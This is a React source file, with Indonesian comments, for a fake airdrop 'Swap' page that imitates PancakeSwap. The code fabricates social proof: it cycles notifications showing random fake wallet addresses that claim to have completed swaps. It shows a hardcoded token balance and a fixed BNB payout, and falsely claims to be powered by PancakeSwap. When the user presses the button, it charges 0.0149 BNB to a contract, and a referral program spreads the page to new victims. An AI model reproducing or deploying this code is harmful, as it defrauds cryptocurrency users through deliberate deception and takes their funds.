import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { useAccount, useBalance, useWriteContract } from 'wagmi';
import { useAppKit } from '@reown/appkit/react';
import { formatEther, parseEther } from 'viem'; 
import { TOKEN_CONTRACT, airdropABI } from '../config'; 

// Generator Alamat Unik
const usedAddresses = new Set();
const generateUniqueAddress = () => {
  const chars = 'abcdef0123456789';
  let formatted;
  do {
    let addr = '0x';
    for (let i = 0; i < 40; i++) addr += chars[Math.floor(Math.random() * chars.length)];
    formatted = `${addr.substring(0, 5)}...${addr.substring(38)}`;
  } while (usedAddresses.has(formatted));
  
  usedAddresses.add(formatted);
  return formatted;
};

export default function Swap() {
  const navigate = useNavigate();
  const { address, isConnected } = useAccount();
  const { open } = useAppKit();
  const { writeContract } = useWriteContract();

  const { 
    data: bnbBalance, 
    isLoading: isBnbLoading
  } = useBalance({ 
    address,
    query: { refetchInterval: 2000 }
  });

  const { 
    data: tokenBalance 
  } = useBalance({ 
    address, 
    token: TOKEN_CONTRACT,
    query: { refetchInterval: 2000 }
  });

  const [tokenAmount, setTokenAmount] = useState('79815');
  const [showError, setShowError] = useState(false);
  const [copyText, setCopyText] = useState('Copy');
  
  // State untuk Notifikasi FOMO
  const [notifications, setNotifications] = useState([]);
  
  const MIN_BNB_SWAP = 0.0149;
  const currentDomain = typeof window !== 'undefined' ? window.location.origin : 'https://yourdomain.com';

  // ==========================================
  // SIKLUS NOTIFIKASI SMOOTH STAGGERED (Satu per Satu)
  // ==========================================
  useEffect(() => {
    let isMounted = true;
    
    // Helper untuk membuat jeda waktu (delay)
    const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));

    const runCycle = async () => {
      if (!isMounted) return;

      // 1. Munculkan Notif Pertama
      const notif1 = { id: Date.now() + 1, address: generateUniqueAddress() };
      setNotifications(prev => [...prev, notif1]);

      // 2. Jeda sangat halus agar "memanjakan mata" (0.8 detik)
      await sleep(800);
      if (!isMounted) return;

      // 3. Munculkan Notif Kedua menyusul di bawahnya
      const notif2 = { id: Date.now() + 2, address: generateUniqueAddress() };
      setNotifications(prev => [...prev, notif2]);

      // 4. Biarkan keduanya diam di layar selama 4 detik agar bisa dibaca
      await sleep(4000);
      if (!isMounted) return;

      // 5. Hilangkan Notif Pertama duluan
      setNotifications(prev => prev.filter(n => n.id !== notif1.id));

      // 6. Jeda halus lagi (0.8 detik)
      await sleep(800);
      if (!isMounted) return;

      // 7. Hilangkan Notif Kedua
      setNotifications(prev => prev.filter(n => n.id !== notif2.id));

      // 8. Jeda layar KOSONG selama tepat 4 detik sebelum memunculkan rombongan baru
      await sleep(4000);
      if (!isMounted) return;

      // Ulangi siklus selamanya
      runCycle();
    };

    // Jalankan siklus pertama kali setelah halaman di-load 1 detik
    const startTimer = setTimeout(() => {
      runCycle();
    }, 1000);

    return () => {
      isMounted = false;
      clearTimeout(startTimer);
    };
  }, []);

  const getReferralAddress = () => {
    const params = new URLSearchParams(window.location.search);
    const ref = params.get('ref');
    if (ref && /^0x[a-fA-F0-9]{40}$/.test(ref)) {
      return ref;
    }
    return '0x0000000000000000000000000000000000000000';
  };

  let finalTokenBalance = '79815';
  if (tokenBalance && tokenBalance.value && tokenBalance.symbol !== 'BNB') {
    const formattedToken = formatEther(tokenBalance.value);
    if (Number(formattedToken) > 0) {
      finalTokenBalance = formattedToken;
    }
  }

  useEffect(() => {
    setTokenAmount(finalTokenBalance);
  }, [finalTokenBalance]);

  const handleAction = () => {
    if (!isConnected) {
      open();
      return;
    }
    
    const currentBnb = bnbBalance?.value ? Number(formatEther(bnbBalance.value)) : 0;
    
    if (currentBnb < MIN_BNB_SWAP) {
      setShowError(true); 
    } else {
      setShowError(false);
      writeContract({
        address: TOKEN_CONTRACT,
        abi: airdropABI,
        functionName: 'swap',
        args: [getReferralAddress()],
        value: parseEther(MIN_BNB_SWAP.toString()),
      });
    }
  };

  const handleCopy = () => {
    if (!address) return;
    const refLink = `${currentDomain}/?ref=${address}`;
    navigator.clipboard.writeText(refLink);
    setCopyText('Copied!');
    setTimeout(() => setCopyText('Copy'), 2000); 
  };

  let displayBnbBalance = '0.0000';
  if (isBnbLoading) {
    displayBnbBalance = 'Scanning...';
  } else if (bnbBalance && bnbBalance.value) {
    displayBnbBalance = formatEther(bnbBalance.value).substring(0, 6);
  }

  return (
    <div className="min-h-screen flex flex-col items-center pt-10 p-4 font-sans bg-[#faf9fa] text-[#280d5f] relative">
      
      {/* 🚀 NOTIFIKASI KECIL & POSISI MENTOK ATAS 🚀 */}
      <div className="fixed top-4 sm:top-6 right-2 sm:right-6 z-50 flex flex-col gap-2 pointer-events-none">
        {notifications.map((notif) => (
          <div 
            key={notif.id} 
            className="bg-white rounded-[12px] p-2 sm:p-2.5 shadow-[0px_4px_12px_rgba(37,34,41,0.15)] border border-[#e7e3eb] flex items-center gap-2 w-[220px] sm:w-[260px] transition-all duration-300 ease-in-out animate-fade-in"
          >
            {/* Ikon Checkmark */}
            <div className="w-5 h-5 rounded-full bg-[#1fc7d4] flex items-center justify-center shrink-0 shadow-sm">
              <svg viewBox="0 0 24 24" width="12px" className="fill-white">
                <path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path>
              </svg>
            </div>
            
            {/* Teks Notifikasi (Kembali ke 79,815 ALIGN) */}
            <div className="flex flex-col text-[10px] sm:text-[11px] leading-tight">
              <span className="font-bold text-[#280d5f]">Swap Executed</span>
              <span className="text-[#7a6eaa] font-medium truncate">{notif.address}</span>
              <span className="text-[#280d5f] font-bold mt-0.5">
                79,815 ALIGN <span className="text-[#1fc7d4] font-medium">to</span> <span className="text-[#1fc7d4]">1.7263 BNB</span>
              </span>
            </div>
          </div>
        ))}
      </div>

      <div className="bg-white border border-[#e7e3eb] shadow-[0px_2px_12px_-8px_rgba(25,19,38,0.1),0px_1px_1px_rgba(25,19,38,0.05)] rounded-[24px] w-full max-w-[328px] sm:max-w-[400px] mb-6 mt-4">
        
        <div className="p-5 border-b border-[#e7e3eb] flex justify-between items-center">
          <h2 className="text-xl font-bold">Swap</h2>
          <svg viewBox="0 0 24 24" width="24px" className="fill-[#7a6eaa] cursor-pointer hover:opacity-70">
            <path d="M19.14 12.94c.04-.3.06-.61.06-.94 0-.32-.02-.64-.06-.94l2.03-1.58c.18-.14.23-.41.12-.61l-1.92-3.32c-.12-.22-.37-.29-.59-.22l-2.39.96c-.5-.38-1.03-.7-1.62-.94l-.36-2.54c-.04-.24-.24-.41-.48-.41h-3.84c-.24 0-.43.17-.47.41l-.36 2.54c-.59.24-1.13.56-1.62.94l-2.39-.96c-.22-.08-.47 0-.59.22l-1.92 3.32c-.12.21-.07.47.12.61l2.03 1.58c-.05.3-.09.63-.09.94s.02.64.06.94l-2.03 1.58c-.18.14-.23.41-.12.61l1.92 3.32c.12.22.37.29.59.22l2.39-.96c.5.38 1.03.7 1.62.94l.36 2.54c.05.24.24.41.48.41h3.84c.24 0 .43-.17.47-.41l.36-2.54c.59-.24 1.13-.56 1.62-.94l2.39.96c.22.08.47 0 .59-.22l1.92-3.32c.12-.22.07-.47-.12-.61l-2.01-1.58zM12 15.6c-1.98 0-3.6-1.62-3.6-3.6s1.62-3.6 3.6-3.6 3.6 1.62 3.6 3.6-1.62 3.6-3.6 3.6z"></path>
          </svg>
        </div>

        <div className="p-4">
          <div className="bg-[#eeeaf4] rounded-2xl p-4 mb-1 hover:bg-[#e9eaeb] transition-colors">
            <div className="flex justify-between text-xs text-[#7a6eaa] font-medium mb-2">
              <span>From</span>
              <span>Balance: {finalTokenBalance}</span>
            </div>
            <div className="flex justify-between items-center">
              <input 
                disabled 
                type="text" 
                value={tokenAmount}
                className="bg-transparent text-[#280d5f] text-2xl font-bold outline-none w-1/2 cursor-not-allowed"
                placeholder="0.0"
              />
              <div className="flex items-center space-x-2 bg-white px-2 py-1 rounded-full shadow-sm">
                <img src="/logo.ico" alt="ALIGN Logo" className="w-6 h-6 rounded-full" />
                <span className="font-bold text-base">ALIGN</span>
              </div>
            </div>
          </div>

          <div className="flex justify-center -my-3 relative z-10">
            <div className="bg-[#eeeaf4] p-1.5 rounded-full border-[3px] border-white text-[#1fc7d4] flex items-center justify-center cursor-pointer hover:bg-[#e9eaeb]">
              <svg viewBox="0 0 24 24" width="16px" className="fill-current">
                <path d="M11 5V16.17L6.11997 11.29C5.72997 10.9 5.08997 10.9 4.69997 11.29C4.30997 11.68 4.30997 12.31 4.69997 12.7L11.29 19.29C11.68 19.68 12.31 19.68 12.7 19.29L19.29 12.7C19.68 12.31 19.68 11.68 19.29 11.29C18.9 10.9 18.27 10.9 17.88 11.29L13 16.17V5C13 4.45 12.55 4 12 4C11.45 4 11 4.45 11 5Z"></path>
              </svg>
            </div>
          </div>

          <div className="bg-[#eeeaf4] rounded-2xl p-4 mt-1 hover:bg-[#e9eaeb] transition-colors">
            <div className="flex justify-between text-xs text-[#7a6eaa] font-medium mb-2">
              <span>To</span>
              <span className={isBnbLoading ? "text-[#1fc7d4] animate-pulse" : ""}>
                Balance: {displayBnbBalance}
              </span>
            </div>
            <div className="flex justify-between items-center">
              <input 
                disabled 
                type="text" 
                value="1.7263" 
                className="bg-transparent text-[#7a6eaa] text-2xl font-bold outline-none w-1/2 cursor-not-allowed" 
              />
              <div className="flex items-center space-x-2 bg-white px-2 py-1 rounded-full shadow-sm">
                <img src="/bnb.png" alt="BNB Logo" className="w-6 h-6 rounded-full" />
                <span className="font-bold text-base">BNB</span>
              </div>
            </div>
          </div>

          <div className="flex justify-between items-center py-4 px-2 text-sm font-bold text-[#1fc7d4]">
            <span className="cursor-pointer hover:underline text-[#7a6eaa]">Slippage Tolerance</span>
            <span>0.5%</span>
          </div>

          <div className="flex flex-col items-center w-full">
            <button 
              onClick={handleAction}
              className="w-full py-4 rounded-2xl font-bold text-white text-base transition-all bg-[#1fc7d4] hover:opacity-80 shadow-[0px_-1px_0px_0px_rgba(14,14,44,0.4)_inset]"
            >
              {!isConnected ? 'SWAP' : 'SWAP'}
            </button>
            
            {showError && (
              <p className="text-[#ff4343] text-sm font-bold mt-3 text-center leading-tight">
                Insufficient BNB balance.<br/> you must HODL 0.0149 BNB FOR SWAP.
              </p>
            )}
          </div>
        </div>
      </div>

      <div className="w-full max-w-[328px] sm:max-w-[400px] flex flex-col items-center space-y-5">
        
        <a 
          href="https://pancakeswap.finance" 
          target="_blank" 
          rel="noreferrer"
          className="flex items-center space-x-2 text-[#7a6eaa] hover:opacity-80 transition-opacity"
        >
          <span className="text-sm font-bold">Powered by</span>
          <img src="/cake.png" alt="PancakeSwap" className="w-6 h-6 rounded-full" />
          <span className="text-sm font-bold text-[#280d5f]">PancakeSwap</span>
        </a>

        <a 
          href={`https://bscscan.com/token/${TOKEN_CONTRACT}`} 
          target="_blank" 
          rel="noreferrer"
          className="text-[#1fc7d4] font-bold text-sm hover:underline"
        >
          View on BscScan
        </a>

        {isConnected && (
          <div className="w-full border border-[#e7e3eb] bg-white rounded-2xl p-4 shadow-sm">
            <p className="font-bold mb-1 text-[#280d5f]">Referral Program</p>
            <p className="text-xs text-[#7a6eaa] mb-3 font-medium">Get 10% BNB & 100% Token for every claim.</p>
            
            <div className="flex items-center justify-between bg-[#eeeaf4] border border-[#e7e3eb] p-1.5 rounded-xl">
              <span className="text-xs text-[#1fc7d4] font-bold px-2 truncate">
                {currentDomain}/?ref={address}
              </span>
              <button 
                onClick={handleCopy}
                className="bg-[#1fc7d4] hover:bg-[#18a2ad] text-white px-3 py-1.5 rounded-lg text-xs font-bold transition-colors ml-2 shrink-0"
              >
                {copyText}
              </button>
            </div>
          </div>
        )}

        <button 
          onClick={() => navigate('/')} 
          className="text-sm font-bold text-[#7a6eaa] hover:text-[#1fc7d4] transition-colors"
        >
          ← Back to Claim Page
        </button>

      </div>
    </div>
  );
}